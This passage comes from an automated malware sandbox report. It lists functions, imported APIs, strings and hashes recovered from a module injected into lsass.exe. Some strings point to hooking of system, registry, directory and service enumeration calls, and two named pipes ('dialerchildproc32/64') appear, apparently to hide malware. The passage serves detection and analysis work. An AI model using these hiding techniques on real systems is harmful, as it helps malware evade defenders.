RtlCaptureContext.NTDLL ref: 000001CB338E7EB9
RtlLookupFunctionEntry.NTDLL ref: 000001CB338E7ED3
RtlVirtualUnwind.NTDLL ref: 000001CB338E7F14
IsDebuggerPresent.KERNEL32 ref: 000001CB338E7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CB338E7F89
UnhandledExceptionFilter.KERNEL32 ref: 000001CB338E7F94

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: db2fb050424f96b7a9199601d1c11ed81c32f0534f5a22952dd37c89fa393b69
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 52315D7224ABC086FB60DF64E881BEE7360F784B45F44542AEA4D97B98EF78C549C710

Function 000001CB338EB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001CB338EB585
RtlLookupFunctionEntry.NTDLL ref: 000001CB338EB59D
RtlVirtualUnwind.NTDLL ref: 000001CB338EB5D8
IsDebuggerPresent.KERNEL32 ref: 000001CB338EB611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CB338EB61B
UnhandledExceptionFilter.KERNEL32 ref: 000001CB338EB626

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 4b6f165afe4570f181375a65a29c9eb5fceed704b82f303154fd395225176aa5
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: B7314E32259BC086EB60CF29E881BDE73A4F788B55F541116EE9D83B64DF38C5468B00

Function 000001CB338EFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001CB338EFF67
WriteFile.KERNEL32 ref: 000001CB338F021E
WriteFile.KERNEL32 ref: 000001CB338F0270
GetLastError.KERNEL32 ref: 000001CB338F0372
GetLastError.KERNEL32 ref: 000001CB338F03D2

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 1ef65cd3466385580d4748a0ca8de379aab589802a49e1ea71e93c9745d5d2c9
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: A9E101B2749AC08AF700CF64E481ADE7BB1F385B89F105516DE4A97B99DB39C51BC700

Function 000001CB338E12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CB338E1326
GetProcessHeap.KERNEL32 ref: 000001CB338E1334
HeapAlloc.KERNEL32 ref: 000001CB338E1345
RegEnumValueW.ADVAPI32 ref: 000001CB338E13A1

Part of subcall function 000001CB338E1554: StrCmpIW.SHLWAPI ref: 000001CB338E1585

GetProcessHeap.KERNEL32 ref: 000001CB338E13E9
HeapAlloc.KERNEL32 ref: 000001CB338E13F7
GetProcessHeap.KERNEL32 ref: 000001CB338E141B
HeapFree.KERNEL32 ref: 000001CB338E1429
lstrlenW.KERNEL32 ref: 000001CB338E1432
GetProcessHeap.KERNEL32 ref: 000001CB338E1440
HeapAlloc.KERNEL32 ref: 000001CB338E144E
StrCpyW.SHLWAPI ref: 000001CB338E1470
GetProcessHeap.KERNEL32 ref: 000001CB338E1485
HeapFree.KERNEL32 ref: 000001CB338E1493

Strings

d, xrefs: 000001CB338E1365

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 36e075336694569a75ef71943ddecc879709bd781ad67cd28ed3c5136645a556
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 9F519C72249B8493FB10DF66F485B9AB3A1F788F85F049124DE8983B14DF78C196C700

Function 000001CB338E1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001CB338E1EBF

Part of subcall function 000001CB338E2174: GetModuleHandleA.KERNEL32 ref: 000001CB338E218C
Part of subcall function 000001CB338E2174: GetProcAddress.KERNEL32 ref: 000001CB338E219D

Part of subcall function 000001CB338E5C10: GetCurrentThreadId.KERNEL32 ref: 000001CB338E5C4B

Strings

advapi32.dll, xrefs: 000001CB338E1F97, 000001CB338E1FB8
NtQueryDirectoryFileEx, xrefs: 000001CB338E1F3C
ntdll.dll, xrefs: 000001CB338E1ECD
NtEnumerateValueKey, xrefs: 000001CB338E1F76
NtQueryDirectoryFile, xrefs: 000001CB338E1F1F
NtEnumerateKey, xrefs: 000001CB338E1F59
EnumServiceGroupW, xrefs: 000001CB338E1F90
NtResumeThread, xrefs: 000001CB338E1F02
NtDeviceIoControlFile, xrefs: 000001CB338E1FF6
NtQuerySystemInformation, xrefs: 000001CB338E1EE5
EnumServicesStatusExW, xrefs: 000001CB338E1FB1, 000001CB338E1FD2
sechost.dll, xrefs: 000001CB338E1FD9

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 213c126a435aa63b6c5c71154e8537b495190c9bbfe7ba31150c4d214ca23b31
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: C231747429B9C6A0FA04EB58F8D3ED62321B744F46F817523AD19923719F3AD24BC750

Function 000001CB338E23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001CB338E2405
GetCurrentProcessId.KERNEL32 ref: 000001CB338E240F

Part of subcall function 000001CB338E19AC: OpenProcess.KERNEL32 ref: 000001CB338E19CA
Part of subcall function 000001CB338E19AC: IsWow64Process.KERNEL32 ref: 000001CB338E19E0
Part of subcall function 000001CB338E19AC: CloseHandle.KERNEL32 ref: 000001CB338E19FB

CreateFileW.KERNEL32 ref: 000001CB338E2468
WriteFile.KERNEL32 ref: 000001CB338E2490
ReadFile.KERNEL32 ref: 000001CB338E24AF
CloseHandle.KERNEL32 ref: 000001CB338E24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000001CB338E243F
\\.\pipe\dialerchildproc64, xrefs: 000001CB338E2438

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: c60ebe29c9fd93d7df74672e157faf9d13bcbfa2099ebdd07f03f9e1a8e8a641
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: DD21713665978083F710DB24F485B9A73A0F389FA5F501215EE9982BA8DF7DC14ACF00

Function 000001CB338E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CB338E10AB
RegEnumValueW.ADVAPI32 ref: 000001CB338E110E
GetProcessHeap.KERNEL32 ref: 000001CB338E1155
HeapAlloc.KERNEL32 ref: 000001CB338E1163
GetProcessHeap.KERNEL32 ref: 000001CB338E1187
HeapFree.KERNEL32 ref: 000001CB338E1195

Strings

d, xrefs: 000001CB338E10CE

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 785ddce240ee35d8aa333844c5738ed3f81dbfa3fd993c66eb8213252023e018
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: F9416B37219B8097E7608F66E485B9AB7A1F388B85F009125EF8947B54DF38C1A6CB00

Function 000001CB338B69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CB338B6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001CB338B6A6A
_RTC_Initialize.LIBCMT ref: 000001CB338B6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CB338B6ABE
__scrt_release_startup_lock.LIBCMT ref: 000001CB338B6AE9

Memory Dump Source

Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 8fb5fe4f90fc1c8ca4ac30091efbecba73b510cfb20943e81bb99ff710942c38
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: A4816B3168A6C386FE54AF2594D3BDB66A0BB45F82F586025AE45C37D6DF3CC8478700

Function 000001CB338E75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CB338E7618
__scrt_acquire_startup_lock.LIBCMT ref: 000001CB338E766A
_RTC_Initialize.LIBCMT ref: 000001CB338E7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CB338E76BE
__scrt_release_startup_lock.LIBCMT ref: 000001CB338E76E9

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 67587e8b952d1c31c95f19347dec945bf7c5bd067aa821d5634c45eb90ecfa6a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 2E81D13178E2C186FA54AB2DA8C3FEB2290B795F86F186115BE04C7796DB79C8479700

Function 000001CB338E9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000001CB338E9889
GetLastError.KERNEL32 ref: 000001CB338E9897
LoadLibraryExW.KERNEL32 ref: 000001CB338E98C1
FreeLibrary.KERNEL32 ref: 000001CB338E9907
GetProcAddress.KERNEL32 ref: 000001CB338E9913

Strings

api-ms-, xrefs: 000001CB338E98A9

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 7064061b1e11c6b6a030ee932abb8ec174108f6bb197159b8198950ebab4d349
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 4431A43125BBD091FE11EB1AA882BDA6394B749FA2F192525EDAD87390DF7CC5478300

Function 000001CB338F1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001CB338F1BCD
GetLastError.KERNEL32 ref: 000001CB338F1BD9
CloseHandle.KERNEL32 ref: 000001CB338F1BF1
CreateFileW.KERNEL32 ref: 000001CB338F1C1C
WriteConsoleW.KERNEL32 ref: 000001CB338F1C3B

Strings

CONOUT$, xrefs: 000001CB338F1BFD

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 06f5cd298027907d268e6a23d83f6d13434a2f91efbd27422d4e2b0134eabb13
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: E511BF31359B8086F7508B42F886B9A72A0F388FE6F001225EE9DC7794DF7AC9568744

Function 000001CB338E5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CB338E5C4B
GetThreadContext.KERNEL32 ref: 000001CB338E5DB5

Part of subcall function 000001CB338E5A40: GetCurrentThreadId.KERNEL32 ref: 000001CB338E5A44

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: fc01d6510520cdca5c77511656d7b2b35d9c48517a6ed435d2e08176a8bc06c2
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 7BD19E3624EB8885EA709B19E49579B77A0F388F89F101216EE8D87B65DF3DC542CB04

Function 000001CB338E30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CB338E30D7
HeapAlloc.KERNEL32 ref: 000001CB338E30EA
StrCmpNIW.SHLWAPI ref: 000001CB338E316B
GetProcessHeap.KERNEL32 ref: 000001CB338E31D1
HeapFree.KERNEL32 ref: 000001CB338E31DF

Strings

dialer, xrefs: 000001CB338E3164

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 6f891014f539c58fb6a9608bde0db0f482793eb2bf0660cd485ff7db75ca2f0a
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 7E31CA3534AB9192F715DF5AE881BEB63A0FB44F86F046024AE4887754EF78C8A3C700

Function 000001CB338E1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001CB338E1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001CB338E1A58
PathFindFileNameW.SHLWAPI ref: 000001CB338E1A67
lstrlenW.KERNEL32 ref: 000001CB338E1A73
StrCpyW.SHLWAPI ref: 000001CB338E1A86
CloseHandle.KERNEL32 ref: 000001CB338E1A94

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 5d7736df629fdb04a580366088fbeff1d6a4fd7bf9e656a60f8bb3e257dfe36f
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 89018031349A8196FB10DB12F499BAA63A1F788FC2F584035DE8983754DF7DC986C300

Function 000001CB338E37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001CB338E37C8
GetCurrentProcess.KERNEL32 ref: 000001CB338E37D6
VirtualProtectEx.KERNEL32 ref: 000001CB338E37F8
GetCurrentProcess.KERNEL32 ref: 000001CB338E3819
VirtualProtectEx.KERNEL32 ref: 000001CB338E383A
TerminateThread.KERNEL32 ref: 000001CB338E3849

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 1f77551ad27cf53e1b2a265746e6af4cadf7dd493f4a1b8be14ce60691139c27
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: E5112D7565A7C083FB249B25F48AF9B67A0BB88F82F042425DD4987764EF7EC44AC700

Function 000001CB338E90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CB338E9103
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CB338E9198
RtlUnwindEx.NTDLL ref: 000001CB338E91E7

Strings

f, xrefs: 000001CB338E9116
csm, xrefs: 000001CB338E917E

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: a48560de152222ec2e5ecfb2ae51e72d58d119491012d8f714818b9c8a77c2fb
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: B351B13625B6808AFB54CF29E485F9A3795F344F9AF509120DEA687748DBB9C843C700

Function 000001CB338E3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001CB338E3222
StrCpyW.SHLWAPI ref: 000001CB338E3232
StrCatW.SHLWAPI ref: 000001CB338E323E
PathCombineW.SHLWAPI ref: 000001CB338E324C

Strings

\\.\pipe\, xrefs: 000001CB338E3218

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: b13fa7682330cfaff39fc18302c8814ee6bc0de51f7434bfdc1efbd032f6aa83
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 05F089303497C091FA108B67B9865975210B748FD3F086131DD9A87B58CF7DC4878700

Function 000001CB338EA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001CB338EA154
GetProcAddress.KERNEL32 ref: 000001CB338EA16A
FreeLibrary.KERNEL32 ref: 000001CB338EA187

Strings

mscoree.dll, xrefs: 000001CB338EA14B
CorExitProcess, xrefs: 000001CB338EA163

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: db2ee6e2e25eab6272f81190b24a3629a134ae4ae0e9ec08b982b1868799acd9
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: DFF0DA7535A68492FB549B64F8C6BE62360BB88F92F44301A9D4BC6764DF6DC48A8700

Function 000001CB338E51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CB338E5236

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 087bc69684e90bf5b6837604a1c19a69278a4e67605b34399d96d278f5a9468b
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 7802C73225EBC086E7A08B59F49179BB7A1F3C5B85F101115EA8E87BA8DF7CC495CB00

Function 000001CB338F0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001CB338F08A2
GetConsoleMode.KERNEL32 ref: 000001CB338F0960
GetLastError.KERNEL32 ref: 000001CB338F09EA

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: c3c59f5f7d9bf41f64223fcc11c69de60d8d840cee10058ba634ab2fe0acab4e
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 8281E47265A6908DFB519B64E8C2BEF27A1F744F86F542212DE0AD3791DB3AC447C310

Function 000001CB338E57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CB338E5806

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: fd85ee6bccb19a378b8e7da3b4c85f470e712a47499b5d8169853432bb05cc3b
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: A361C93655EA84C6F7609B19F495B9BB7A0F388B45F102215FE8D83BA8CB7CC446CB04

Function 000001CB338C12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001CB338C12E0
_set_statfp.LIBCMT ref: 000001CB338C12FB
_set_statfp.LIBCMT ref: 000001CB338C1317
_set_statfp.LIBCMT ref: 000001CB338C1353

Memory Dump Source

Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 06506e8f26d9db207afb2df5f609808bcc957d9693a4b915801af85efdefcfec
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2E11A332ADEA8045F6A41175E4D3BEB94407B96F7AF5C2624AE76C6BD68B1CCC43C300

Function 000001CB338F1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001CB338F1EE0
_set_statfp.LIBCMT ref: 000001CB338F1EFB
_set_statfp.LIBCMT ref: 000001CB338F1F17
_set_statfp.LIBCMT ref: 000001CB338F1F53

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 98853bc0d20a4e5a8eba01ab371dc6f72503334149b29544cde263489e32e96c
